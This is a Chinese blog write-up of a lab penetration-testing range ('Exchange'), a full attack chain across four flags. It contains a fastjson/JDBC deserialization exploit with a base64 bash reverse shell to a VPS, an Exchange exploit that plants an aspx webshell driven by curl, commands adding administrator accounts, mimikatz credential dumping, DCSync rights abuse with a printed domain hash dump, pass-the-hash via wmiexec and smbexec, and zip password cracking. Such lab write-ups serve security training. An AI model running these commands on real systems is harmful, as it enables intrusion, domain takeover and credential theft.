春秋云境Exchange-WP【一遍过】

最新推荐文章于 2024-07-17 23:48:55 发布

Jugg_xie

最新推荐文章于 2024-07-17 23:48:55 发布

阅读量535

点赞数 1

分类专栏：渗透文章标签：安全

本文链接：https://blog.csdn.net/weixin_63576152/article/details/133812310

版权

渗透专栏收录该内容

13 篇文章 0 订阅

订阅专栏

flag01

fscan扫描

打8000端口,admin/123456登录

官方插件（右上角）-> 华夏ERP，找找漏洞，可以打jdbc

vps上起个恶意mysql -->https://github.com/fnmsd/MySQL_Fake_Server

下载ysoserial jar包放到server.py目录下-->https://github.com/frohoff/ysoserial/releases

修改config.json

①base64中的ip和port需要改成自己vps的ip和port

②javaBinPath为vps上java的路径

{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections7":["CommonCollections7","bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}"]
    }
}

exp：

{
	"name": {
		"@type": "java.lang.AutoCloseable",
		"@type": "com.mysql.jdbc.JDBC4Connection",
		"hostToConnectTo": "vps",
		"portToConnectTo": 3306,
		"info": {
			"user": "CommonsCollections7",
			"password": "pass",
			"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
			"autoDeserialize": "true",
			"NUM_HOSTS": "1"
		}
	}
}

开启fake mysql server

python3 server.py

将exp的内容进行url编码

vps上监听端口

burpsuit抓包，改为/user/list?search=，再添加exp，发送

getshell

在/root/flag里找到flag01.txt

flag02

上传fscan和frp，开代理

nohup ./frpc -c  frpc.ini &

收集信息

start infoscan
(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.26     is alive
[*] Icmp alive hosts len is: 4
172.22.3.12:8000 open
172.22.3.9:8172 open
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.26:139 open
172.22.3.9:139 open
172.22.3.2:139 open
172.22.3.26:135 open
172.22.3.9:135 open
172.22.3.2:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.9:808 open
172.22.3.2:88 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] NetInfo:
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] WebTitle: http://172.22.3.12        code:200 len:19813  title:lumia
[*] NetBios: 172.22.3.2      [+]DC XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393 
[*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.3.26     XIAORANG\XIAORANG-PC           
[*] WebTitle: http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] NetInfo:
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] NetBios: 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         LWindows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle: http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle: https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook

总结出下面的拓扑

172.22.3.12     当前机器
172.22.3.9      域内Exchange机
172.22.3.2      域控
172.22.3.26     域内机器

172.22.3.9 上面有个outlook，先看看

https://172.22.3.9/owa/

用exp直接打（exprolog.py），盲猜邮件后缀是xiaorang.lab

proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

成功写入shell

用他给的命令测试

proxychains4 curl --request POST --url https://172.22.3.9/owa/auth/jm6yz.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k

成功

添加用户

proxychains4 curl --request POST --url https://172.22.3.9/owa/auth/jm6yz.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("net user test Abcd1234 /add").stdout.readall())' -k
proxychains4 curl --request POST --url https://172.22.3.9/owa/auth/jm6yz.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("net localgroup administrators test /add").stdout.readall())' -k

远程登录172.22.3.9

得到flag02

flag04

上传mimikatz抓hash

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit

整理信息如下

Zhangtong
22c7f81993e96ac83ac2f3f1903de8b4

XIAORANG-EXC01$
c92ede9b246ffcc04d88b872d7a3a1f6

BloodHound 分析（我的sharphound会报错没有连接ldap，不知道为什么），发现exchange这台机器上的域用户有writeDacl权限，也就是zhangtong，因此可以写 DCSync

SharpHound.exe -c all --OutputDirectory ./

给zhangtong加上dcsync权限（bloodyad.py）

proxychains python3 bloodyAD.py -d xiaorang.lab -u 'XIAORANG-EXC01$' -p :c92ede9b246ffcc04d88b872d7a3a1f6 --host 172.22.3.2 add dcsync Zhangtong

dump域内用户的hash

proxychains impacket-secretsdump xiaorang.lab/XIAORANG-EXC01\$@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc

xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:66169a1dcf8fb670fb3294a06400815c:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:f5761f49d266f7ff17bb89102f76a5c6:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:e67f038894716fdc100aa8c33d780399:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:c92ede9b246ffcc04d88b872d7a3a1f6:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:3bb1e81e724aed1963950e86489b607c:::
[*] Cleaning up...

连接域控，得到flag04

proxychains impacket-wmiexec xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2

flag03

还有个域内机器172.22.3.26没利用过（应该就是上面dump到的lumia用户）

可以用smbexec横向过去（但是终端里找东西有点麻烦）

proxychains python3 smbexec.py -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -codec gbk

也可以在刚刚拿到的域控上添加用户，远程登录172.22.3.2

net user test2 Abcd1234 /add
net localgroup administrators test2 /add

修改lumia的密码

xiaorang.lab\Lumia
Abcd1234

远程登录172.22.3.26，看到桌面有个压缩包

用刚改的密码登录之前的outlook网页，翻邮件知道密码是手机号

导出后做成字典passwd.txt，爆破得到密码（速度惊人得快），找到flag03

zip2john secret.zip > hash.txt
john --wordlist=passwd.txt hash.txt

Jugg_xie

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
春秋云境Exchange-WP【一遍过】

BloodHound 分析（我的sharphound会报错没有连接ldap，不知道为什么），发现exchange这台机器上的域用户有writeDacl权限，也就是zhangtong，因此可以写 DCSync。burpsuit抓包，改为/user/list?search=，再添加exp，发送。导出后做成字典passwd.txt，爆破得到密码（速度惊人得快），找到flag03。用刚改的密码登录之前的outlook网页，翻邮件知道密码是手机号。官方插件（右上角）-> 华夏ERP，找找漏洞，可以打jdbc。
复制链接

扫一扫